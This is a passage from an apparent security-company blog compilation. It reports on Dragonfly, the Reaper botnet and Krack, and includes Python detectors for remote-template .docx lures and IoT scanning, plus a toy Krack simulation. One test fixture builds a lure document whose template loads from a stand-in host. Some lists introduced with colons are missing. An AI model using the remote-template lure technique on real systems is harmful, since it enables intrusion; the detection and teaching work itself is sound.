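REMOTE_TARGET = re.compile(r"^(\\\\|https?://|file://[^/])", re.IGNORECASE)


def find_remote_templates(docx_bytes: bytes) -> List[str]:
    """Return every external attachedTemplate target that leaves the local machine."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return findings            # no settings relationships: nothing to fetch
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter(REL_NS + "Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
            findings.append(target)
    return findings


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Build a minimal constructed .docx for testing; None means no attached template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        if template_target is not None:
            zf.writestr(RELS_PATH,
                        '<?xml version="1.0" encoding="UTF-8"?>'
                        f'<Relationships xmlns="{REL_NS[1:-1]}">'
                        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                        f'Target="{html.escape(template_target, quote=True)}" '
                        'TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx(r"\\template-host.example\share\invoice.dotx")
    print("remote templates:", find_remote_templates(lure))
    local = build_sample_docx("file:///C:/Users/me/Templates/Normal.dotm")
    print("remote templates:", find_remote_templates(local))
```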
2. Watering Holes
According to US-CERT and Symantec, the cyber espionage group used "watering holes" – websites that have legitimate content by reputable organizations but are altered by the threat group to have malicious content. Almost half of the known watering holes, the US Computer Emergency Readiness Team said, are reputable websites that offer information to those in the critical infrastructure sector.
“As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials, by compromising websites that were likely to be visited by those involved in the energy sector,” Symantec said.
3. Social Engineering
These stolen network credentials, according to Symantec, were then used for follow-up attacks on the target critical infrastructure organization itself by delivering trojanized software – malicious software that’s disguised as legitimate software.
One of the trojans used by Dragonfly group is Karagany.B – malicious software that infiltrates computer systems of target organizations by masquerading as Flash updates. The group here used the old hacking tactic of social engineering – convincing victims they need to download software, in this case, an update for their Flash player.
The trojan Karagany.B gives attackers remote access to the victims’ computer systems and allows them to install additional malicious tools if needed. Another trojan used by the group, according to Symantec, is Heriplor – malicious software that also gives attackers remote access to the victims’ computer systems.
“Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is behind the more recent attacks,” Symantec said. “This custom malware is not available on the black market, and has not been observed being used by any other known attack groups.”
Symantec noted that Dragonfly’s origins cannot be definitively determined. While some of Dragonfly’s malware code was written in Russian and French, Symantec noted, this could be a way to mislead people.
How to Prevent Dragonfly Attacks
To prevent Dragonfly attacks, the US-CERT recommends the following:
Reaper IoT Botnet Threatens to Take Down Websites
Reaper IoT botnet, considered as more powerful than the Mirai botnet, is spreading worldwide and threatens to take down websites.
According to Check Point researchers, the Reaper botnet already infected one million IoT devices worldwide. "So far we estimate over a million organizations have already been affected worldwide, including the US, Australia and everywhere in between, and the number is only increasing," Check Point researchers said.
Researchers at Qihoo 360 Netlab, meanwhile, reported that the number of “vulnerable devices in one c2 queue waiting to be infected” reached over 2 million.
An IoT botnet is a collection of internet-connected smart devices that are infected by the same malware and controlled by a cyber criminal from a remote location. It’s typically used by cyber criminals to launch a distributed denial-of-service (DDoS) attack.
The United States Computer Emergency Readiness Team (US-CERT) defines a DDoS attack this way: “In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses.”
Infecting millions of IoT devices with a malware is a time-consuming task. Cyber criminals found a way to automate this task by creating a botnet – an army of infected IoT devices. The Reaper malware, as well as the Mirai malware, is spread by the IoT devices themselves. After infecting a particular IoT device, this infected device starts to look for other devices to infect.
The Mirai botnet in October 2016 brought down major websites – including Twitter, Spotify and Reddit – by launching a DDoS attack against the DNS infrastructure of New Hampshire-based company Dyn. Many major websites rely on Dyn’s internet infrastructure.
Reaper Botnet versus Mirai Botnet
While the Reaper botnet shares similar characteristics with Mirai, it differs in many ways with the Mirai botnet. On September 30, 2016, the attacker known as “Anna-senpai” publicly released the source code of Mirai. According to Check Point and Qihoo 360 Netlab researchers, Reaper borrows some of the source code of Mirai, but this new botnet is significantly different from Mirai in several key behaviors.
Here are some of the differences between Reaper and Mirai:
1. Number of Affected IoT Devices
The first difference between the Reaper botnet and Mirai botnet is in terms of the number of affected IoT devices. Mirai affected about 500,000 IoT devices, while Reaper has infected over a million IoT devices.
2. Means of Infecting IoT Devices
Mirai was able to infect hundreds of thousands of IoT devices by exploiting the lax attitude of IoT users of not changing the factory or default login and password details. By using default login and password details, Mirai attackers were able to infect a massive number of IoT devices.
Reaper, on the other hand, infects IoT devices by exploiting several IoT vulnerabilities for which the devices’ manufacturers may or may not have issued security updates or patches. Reaper attackers can therefore infect IoT devices even when a strong password is used, as the means of entry to the device is the exploitation of known software vulnerabilities.
According to Check Point researchers, the Reaper, for instance, infects unpatched wireless IP cameras by exploiting the “CVE-2017-8225” vulnerability.
3. Botnet Capabilities
Mirai already showed what it can do: it brought down major websites worldwide, even if only for a few hours. For Reaper, it’s still unclear what its operators intend. As of this writing, judging by the code they wrote, Reaper’s creator or creators just want to infect as many IoT devices as possible and have not yet written the command to attack any internet infrastructure or websites.
"It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organizations make proper preparations and defense mechanisms are put in place before an attack strikes," Check Point researchers said.
The sheer number of IoT devices infected by Reaper – more than twice the number of Mirai’s victims – shows how powerful and devastating Reaper could be when used to launch a DDoS attack.
Gartner projected that 8.4 billion IoT devices will be in use worldwide in 2017 and will reach 20.4 billion by 2020. Examples of IoT devices include security systems (alarm systems, surveillance cameras), automation devices (devices that control lighting, heating and cooling, electricity), smart appliances (refrigerators, vacuums, stoves) and wearables (fitness trackers, clothing, watches).
"As more businesses and homeowners use Internet-connected devices to enhance company efficiency or lifestyle conveniences, their connection to the Internet provides new vulnerabilities for malicious cyber actors to exploit," the US Federal Bureau of Investigation (FBI) said. "Once an IoT device is compromised, cyber criminals can facilitate attacks on other systems or networks, send spam e-mails, steal personal information, interfere with physical safety, and leverage compromised devices for participation in distributed denial of service (DDoS) attacks."
How to Block Reaper IoT Botnet
In most cases, owners of infected IoT devices are unaware that their devices are infected and being used for criminal activities such as launching a DDoS attack. IoT users who fail to change their devices’ default login and password details, or fail to apply security updates, are part of the problem, “blindly” contributing to cyber criminal activities like DDoS attacks.
Here are the top cyber security measures to stop attackers from infecting your IoT devices and turning them into a botnet:
1. Apply Security Updates to IoT Software in a Timely Manner
Always apply in a timely manner all security updates issued by your IoT manufacturer.
2. Use a Strong Password
While sophisticated malware like Reaper can bypass a strong password, it still pays to use one to ward off less sophisticated malware.
3. Isolate IoT devices on their own protected networks.
4. Block traffic from unauthorized IP addresses by configuring network firewalls.
5. Turn off IoT devices when not in use.
6. When buying an IoT device, look for manufacturers that offer software updates.
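An infected device that "starts to look for other devices to infect" shows up in firewall logs as one source contacting many neighbours on the same port in a short time, and an isolated IoT segment (tip 3) makes that easy to watch. The following is an added example, not code from Check Point or Qihoo 360 Netlab, of that check run over a constructed log; the log format, the IoT subnet and the threshold are assumptions.

```python
"""Flag an IoT host that has begun sweeping other devices, as a worm does.
Added example; the log format, subnet and threshold are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

IOT_SUBNET = ip_network("192.168.50.0/24")   # assumed isolated IoT segment
THRESHOLD = 20                               # distinct targets on one port ...
WINDOW = timedelta(minutes=5)                # ... within this window => scanning

Event = Tuple[datetime, str, str, int]


def parse_line(line: str) -> Event:
    """Parse a constructed firewall line: '<iso-time> SRC=a.b.c.d DST=e.f.g.h DPT=n'."""
    ts, src, dst, dpt = line.split()
    return (datetime.fromisoformat(ts), src.split("=", 1)[1],
            dst.split("=", 1)[1], int(dpt.split("=", 1)[1]))


def find_scanners(lines: List[str]) -> Dict[Tuple[str, int], int]:
    """Return {(source, port): peak distinct destinations} for IoT hosts over THRESHOLD."""
    events = sorted(parse_line(line) for line in lines if line.strip())
    recent: Dict[Tuple[str, int], List[Tuple[datetime, str]]] = defaultdict(list)
    alerts: Dict[Tuple[str, int], int] = {}
    for ts, src, dst, dpt in events:
        if ip_address(src) not in IOT_SUBNET:
            continue                        # only the IoT segment is in scope here
        bucket = recent[(src, dpt)]
        bucket.append((ts, dst))
        while bucket and ts - bucket[0][0] > WINDOW:
            bucket.pop(0)                   # slide the window forward
        distinct = len({d for _, d in bucket})
        if distinct >= THRESHOLD:
            alerts[(src, dpt)] = max(alerts.get((src, dpt), 0), distinct)
    return alerts


def constructed_sample_log() -> List[str]:
    """Constructed log: one camera sweeping telnet across a /24, one healthy thermostat."""
    base = datetime(2017, 10, 24, 10, 0, 0)
    lines = [f"{(base + timedelta(seconds=4 * i)).isoformat()} "
             f"SRC=192.168.50.12 DST=10.0.3.{i + 1} DPT=23" for i in range(25)]
    lines += [f"{(base + timedelta(seconds=30 * i)).isoformat()} "
              f"SRC=192.168.50.20 DST=203.0.113.9 DPT=443" for i in range(5)]
    return lines


if __name__ == "__main__":
    for (src, port), n in find_scanners(constructed_sample_log()).items():
        print(f"{src} contacted {n} distinct hosts on port {port} within {WINDOW}")
```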
'Secure' Wi-Fi Standard Has Serious Security Flaws
Researchers from the University of Leuven in Belgium have discovered a series of serious wi-fi security flaws that essentially eliminate wi-fi privacy.
This series of wi-fi vulnerabilities, collectively dubbed “Krack” (short for key reinstallation attacks), allows access to data that was previously presumed to be safely encrypted. Krack attackers can steal wi-fi passwords, chat messages, emails, photos and other sensitive information. It’s also possible, depending on device use and the network configuration, for Krack attackers to inject malicious software like ransomware into websites.
The University of Leuven researchers, in their paper entitled “Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2” (PDF) said that “every Wi-Fi device is vulnerable” to Krack attacks.
"The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations,” lead researcher Mathy Vanhoef said.
Wi-Fi Alliance, a non-profit organization that promotes wi-fi technology and certifies wi-fi products, said, “Recently published research identified vulnerabilities in some Wi-Fi devices where those devices reinstall network encryption keys under certain conditions, disabling replay protection and significantly reducing the security of encryption.”
For its part, the International Consortium for Advancement of Cybersecurity on the Internet (ICASI), in a statement said, “Depending on the specific device configuration, successful exploitation of these vulnerabilities could allow unauthenticated attackers to perform packet replay, decrypt wireless packets, and to potentially forge or inject packets into a wireless network.”
ICASI members include Amazon, Cisco Systems, IBM, Intel Corporation, Juniper Networks, Microsoft Corporation and Oracle Corporation.
How Krack Works
For Krack to work, the attacker must be within range of a victim. As a proof of concept, lead researcher Vanhoef executed Krack attacks against wi-fi devices. Vanhoef was able to show that Krack not only steals login credentials – including email addresses and passwords – but that all data the victim transmits can be decrypted.
It’s also doable for Krack attackers, depending on the network setup and the device being used, to decrypt, not just data sent over wi-fi but also data sent towards the victim, for instance, the content of a website.
“Although websites or apps may use HTTPS as an additional layer of protection, we warn that this extra protection can (still) be bypassed in a worrying number of situations,” Vanhoef said. “For example, HTTPS was previously bypassed in non-browser software, in Apple's iOS and OS X, in Android apps, in Android apps again, in banking apps, and even in VPN apps.”
Krack is able to decrypt not just data sent over wi-fi but also data sent towards the victim by exploiting the vulnerabilities in the 4-way handshake of the Wi-Fi Protected Access 2 (WPA2) protocol.
The 4-way handshake is a 14-year-old technology that supposedly ensures wi-fi privacy by installing a fresh and unique encryption key that’ll be used to encrypt all subsequent traffic every time a device joins a protected wi-fi network.
Instead of installing a fresh and unique encryption key, Krack tricks the device into reinstalling an already-in-use encryption key. This is done by manipulating and replaying handshake messages. The researchers also found that Krack similarly exploits other wi-fi handshakes, including PeerKey handshake, the group key handshake and the Fast BSS Transition (FT) handshake.
As mentioned, Krack is a series of wi-fi vulnerabilities. This means that not just one wi-fi vulnerability is exploited by Krack. The Common Vulnerabilities and Exposures (CVE) – a dictionary of common names for publicly known cyber security vulnerabilities – lists the following specific vulnerabilities related to Krack:
According to Wi-Fi Alliance, there’s no evidence that Krack has been exploited maliciously in the wild.
How to Prevent Krack Attacks
To prevent Krack attacks, make sure to update your wi-fi device as soon as a patch or security update becomes available. A security update ensures that an encryption key is only installed once, preventing Krack attacks.
Changing your wi-fi network’s password won’t stop Krack attacks. The only remedy is to apply the patch or security update for your wi-fi device as soon as it becomes available. It’s also important to update your router’s firmware. While patching your wi-fi devices and router is what matters, it also pays to change the wi-fi password as a precaution.
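Why reinstalling an already-in-use key breaks the encryption, and why "install a key only once" fixes it, can be shown with a small model of the client side of the handshake described under "How Krack Works". This is an added example, not the researchers' code: a hash-based stream cipher stands in for WPA2's real cipher, and only the key-installation step of the 4-way handshake is modelled.

```python
"""Toy model of the WPA2 key-installation flaw behind Krack and of the fix.
Added example; SHA-256 in counter mode stands in for CCMP."""
import hashlib
import os
from typing import Dict, Set, Tuple


def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Toy CTR-style keystream: SHA-256(key || nonce || block counter)."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce.to_bytes(6, "big") + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Client side of the handshake, reduced to how it reacts to message 3."""

    def __init__(self, patched: bool) -> None:
        self.patched = patched
        self.ptk: bytes = b""
        self.tx_nonce = 0                 # packet number; must never repeat under one key
        self.installed: Set[bytes] = set()

    def on_message3(self, ptk: bytes) -> None:
        """Install the pairwise key. Message 3 may be retransmitted (or replayed by
        an attacker); the standard resets the nonce to zero on every install, so a
        vulnerable client reuses nonces after a reinstall. The fix installs a given
        key only once and keeps counting."""
        if self.patched and ptk in self.installed:
            return                        # already in use: keep the nonce counter
        self.ptk = ptk
        self.tx_nonce = 0
        self.installed.add(ptk)

    def encrypt(self, plaintext: bytes) -> Tuple[int, bytes]:
        nonce = self.tx_nonce
        self.tx_nonce += 1
        return nonce, xor(plaintext, keystream(self.ptk, nonce, len(plaintext)))


def simulate(patched: bool) -> Dict[str, object]:
    """msg3 -> frame A -> replayed msg3 -> frame B. Report what an observer learns:
    with nonce reuse, XOR of the two ciphertexts equals XOR of the two plaintexts."""
    ptk = os.urandom(16)
    client = Supplicant(patched)
    frame_a = b"GET /mail HTTP/1.1"       # constructed plaintexts of equal length
    frame_b = b"Cookie: session=42"
    client.on_message3(ptk)
    nonce_a, ct_a = client.encrypt(frame_a)
    client.on_message3(ptk)               # the retransmitted / replayed message 3
    nonce_b, ct_b = client.encrypt(frame_b)
    return {
        "nonces": (nonce_a, nonce_b),
        "nonce_reused": nonce_a == nonce_b,
        "plaintext_xor_leaked": xor(ct_a, ct_b) == xor(frame_a, frame_b),
    }


if __name__ == "__main__":
    print("vulnerable:", simulate(patched=False))
    print("patched:   ", simulate(patched=True))
```

The leaked XOR of plaintexts is what lets an eavesdropper recover traffic once part of one frame is predictable, which is why the fix is a client-side patch rather than a new wi-fi password.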
According to Vanhoef, they notified wi-fi manufacturers about the Krack issue on July 14, 2017. They also notified the Computer Emergency Response Team Coordination Center (CERT/CC) – the world’s first computer emergency response team for internet security incidents. CERT/CC, in turn, issued a broad notification to wi-fi manufacturers on August 28, 2017 about this issue.
“We have released a security update to address this issue,” a Microsoft spokesperson told The Verge. “Customers who apply the update, or have automatic updates enabled, will be protected. We continue to encourage customers to turn on automatic updates to help ensure they are protected.”
Windows updates released last October 10, according to Microsoft, addressed this issue. The company said it “withheld disclosure until other vendors could develop and release updates”.
“Wi-Fi Alliance now requires testing for this vulnerability within our global certification lab network and has provided a vulnerability detection tool for use by any Wi-Fi Alliance member,” the alliance said. “Wi-Fi Alliance is also broadly communicating details on this vulnerability and remedies to device vendors and encouraging them to work with their solution providers to rapidly integrate any necessary patches.”
Top 7 Cyber Security Tools for Your Business
With so much of our information online, everyone is vulnerable to hackers and cyber-thieves. When it comes to business, a cyber invasion is a constant threat.
Short term loss could be financial, intellectual property theft, data loss, or worse.
The real threat is the long term loss of trust and reputation damage that could take years to repair. If your clients' information is exposed, it will be hard for them to consider it safe to give you their business again.
Protect your business with these 7 cyber security tools.
7 Cyber Security Tools Your Business Must Be Using
In order to protect your business' digital information, you need a variety of cyber security tools in place.
For complete peace of mind, you'll want to work with a trusted cyber security partner. In the meantime, these tools are a great place to start.
1. Malware Scanners
Malware is short for malicious software. It is designed by hackers to gain access to a computer without the owner's knowledge.
You must have specific anti-malware cyber security tools in place to detect any hacker invasion.
There are a variety of malware scanners out there, many even available for free (with limited features).
Protect your business with automatic malware scanners in place.
2. Routine Patching
Patching is the process of installing a piece of software that repairs any security flaws. Updating an app is an example of patching.
Picture your business's digital infrastructure as a house. Each time you add a new application, piece of software, etc. it's like adding a new room to the house.
Software, apps, and the like are built by humans, meaning that there is room for human error. Human error is like an unlocked door or unfinished window in one of the new rooms.
This can leave a welcome mat out to cyber attackers. That's why your security plan needs to include routine assessments and patching.
3. Two-Factor Authentication
Use two-factor authentication to add a difficult-to-hack layer of security to your log in systems.
Examples include a verification code sent to a linked phone number or a piece of information only the user would know.
4. Restrictive Administrative Access
Add an additional security level for your most sensitive information and infrastructure by restricting who can access it.
5. Network Segmentation
Divide your computer network into sub networks to improve security and performance.
This allows you to isolate the most sensitive data to a specific network to limit access and decrease congestion.
6. Vulnerability Scanning
There's no better way to assess your security level than a vulnerability scan.
Try our free vulnerability assessment to find weaknesses in your code and how to remedy them.
7. 24/7 Security Monitoring
Cyber security protection doesn't come in the form of a quick fix.
Continually protect your business' data with a 24/7 security monitoring system in place to catch attacks the minute they happen.
Protect Your Business for Peace of Mind
Cyber security tools are of the utmost importance for businesses and individuals alike.
Questions? Let us know if there is anything we can help you with. Our emergency response team is available 24/7 if you're currently dealing with a cyber attack. Contact us today.
Steve E. Driz